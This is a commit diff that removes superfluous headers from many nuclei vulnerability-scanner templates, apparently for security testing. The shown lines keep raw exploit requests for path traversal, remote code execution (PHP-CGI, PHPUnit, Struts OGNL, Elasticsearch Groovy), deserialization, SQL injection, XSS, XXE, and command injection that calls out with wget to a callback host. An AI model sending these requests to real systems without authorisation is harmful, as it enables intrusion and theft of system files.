Merge pull request #2612 from projectdiscovery/cleanups

Removed extra headers not required for template
patch-1
Sandeep Singh 2021-09-09 14:50:00 +05:30 committed by GitHub
commit 54c9f08233
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
198 changed files with 146 additions and 1015 deletions

View File

@ -12,24 +12,17 @@ requests:
- |
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
"1":1
- |
GET /public/index.php/home/file/user_pics HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
Accept-Encoding: deflate
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
extractors:
- type: regex

View File

@ -12,7 +12,6 @@ requests:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and

View File

@ -14,7 +14,6 @@ requests:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
@ -22,7 +21,6 @@ requests:
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");

View File

@ -17,11 +17,7 @@ requests:
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

View File

@ -16,9 +16,7 @@ requests:
- |
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
<?php echo shell_exec("cat /etc/passwd"); ?>

View File

@ -18,10 +18,7 @@ requests:
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,

View File

@ -17,10 +17,7 @@ requests:
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"name": "test"
@ -29,11 +26,7 @@ requests:
POST /_search HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}

View File

@ -12,18 +12,12 @@ requests:
- |+
GET /?author=1 HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Connection: close
- |+
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login={{username}}

View File

@ -16,7 +16,6 @@ requests:
- |
GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Length: 4
matchers-condition: and
matchers:

View File

@ -17,10 +17,7 @@ requests:
- |
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 160
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

View File

@ -17,10 +17,7 @@ requests:
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

View File

@ -13,11 +13,7 @@ requests:
- |
PUT /_users/org.couchdb.user:poc HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 108
{
"type": "user",

View File

@ -16,35 +16,28 @@ requests:
- |
POST /maint/index.php?packages HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: {{Hostname}}/maint/index.php?packages
Content-Length: 160
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
- |
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: {{Hostname}}/maint/index.php?packages
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -13,10 +13,7 @@ requests:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Length: 264
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ
Accept-Encoding: gzip, deflate
Connection: close
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
@ -34,9 +31,6 @@ requests:
Host: {{Hostname}}
Accept-Encoding: gzip,deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
req-condition: true
matchers:

View File

@ -14,11 +14,9 @@ info:
requests:
- raw:
- |
GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Connection: close
payloads:
endpoint:

View File

@ -16,10 +16,8 @@ requests:
POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
Content-Type: text/xml;charset=UTF-8
Content-Length: 873
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>

View File

@ -13,11 +13,7 @@ requests:
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:

View File

@ -17,10 +17,6 @@ requests:
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
matchers:
- type: word

View File

@ -13,12 +13,8 @@ requests:
- |
GET /__ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\Windows\win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>
matchers-condition: and

View File

@ -18,78 +18,42 @@ requests:
- |
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 17
Accept: */*
Accept-Language: en
Content-Type: text/html
Accept-Encoding: gzip, deflate
<?php echo md5(phpunit_rce);?>

View File

@ -12,21 +12,15 @@ requests:
- |
POST /jolokia/read/getDiagnosticOptions HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
{
"type" : "read",
"mbean" : "java.lang:type=Memory",
"target" : {
"url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
"type":"read",
"mbean":"java.lang:type=Memory",
"target":{
"url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
}
matchers-condition: and
@ -35,6 +29,7 @@ requests:
words:
- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
part: body
- type: status
status:
- 200

View File

@ -17,8 +17,6 @@ requests:
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd

View File

@ -12,8 +12,6 @@ requests:
- method: GET
path:
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
matchers-condition: and
matchers:

View File

@ -15,8 +15,6 @@ requests:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
@ -24,8 +22,6 @@ requests:
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}

View File

@ -15,10 +15,6 @@ requests:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B

View File

@ -15,7 +15,6 @@ requests:
- |
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
matchers-condition: and
matchers:

View File

@ -15,7 +15,6 @@ requests:
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Referer: {{BaseURL}}
matchers:

View File

@ -13,7 +13,6 @@ requests:
- |+
GET /etc/passwd HTTP/1.1
Host:
Content-Length: 4
unsafe: true
matchers-condition: and
@ -21,6 +20,7 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -19,13 +19,10 @@ requests:
- |
GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 94
- |
GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
extractors:
- type: regex

View File

@ -12,13 +12,10 @@ requests:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 626
Connection: close
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"

View File

@ -14,11 +14,6 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin
matchers-condition: and

View File

@ -16,14 +16,7 @@ requests:
- |
POST /timesheet/login.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login
@ -32,6 +25,7 @@ requests:
- type: status
status:
- 200
- type: word
words:
- '><script>javascript:alert(document.domain)</script>'

View File

@ -22,7 +22,6 @@ requests:
- |
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
@ -30,8 +29,6 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and

View File

@ -17,8 +17,6 @@ requests:
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:

View File

@ -13,14 +13,9 @@ requests:
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://{{Hostname}}/
Referer: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Connection: close
Upgrade-Insecure-Requests: 1
user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2

View File

@ -12,9 +12,6 @@ requests:
- |
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Content-Length: 1
Connection: close
echo
echo

View File

@ -13,41 +13,27 @@ requests:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://{{Hostname}}/
Upgrade-Insecure-Requests: 1
Referer: {{BaseURL}}
html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://{{Hostname}}/login_pic.asp
Referer: {{BaseURL}}/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: http://{{Hostname}}/login_pic.asp
Referer: {{BaseURL}}/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
matchers-condition: and
matchers:
- type: regex
@ -55,6 +41,7 @@ requests:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:

View File

@ -13,7 +13,6 @@ requests:
- |
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
Accept-Language: en-US,en;q=0.9
payloads:

View File

@ -11,14 +11,11 @@ requests:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {

View File

@ -16,7 +16,6 @@ requests:
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{{interactsh-url}}">

View File

@ -12,12 +12,7 @@ requests:
- |
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
@ -26,6 +21,7 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "<param-name>contextConfigLocation</param-name>"

View File

@ -12,11 +12,7 @@ requests:
- |
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}

View File

@ -11,31 +11,21 @@ info:
tags: cve,cve2019,emerge,rce
requests:
- raw: # Default Port
- raw:
- |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
- |
GET /nuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -10,31 +10,27 @@ info:
- https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
tags: cve,cve2019,kibana,rce
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
# An attacker with access to the Timelion application could send a request
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
requests:
- method: POST
path:
- "{{BaseURL}}/api/timelion/run"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
Content-Type: "application/json; charset=utf-8"
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
matchers-condition: and
matchers:
- type: word
words:
- "seriesList"
part: body
- type: word
words:
- "Content-Type: application/json"
- "application/json"
part: header
- type: status
status:
- 200

View File

@ -12,7 +12,6 @@ requests:
- |
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
<!DOCTYPE xxe [

View File

@ -1,4 +1,5 @@
id: CVE-2019-9733
info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
@ -15,18 +16,13 @@ requests:
- |
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Content-Length: 60
Accept: application/json, text/plain, */*
X-Requested-With: artUI
serial: 58
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Content-Type: application/json
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/artifactory/webapp/
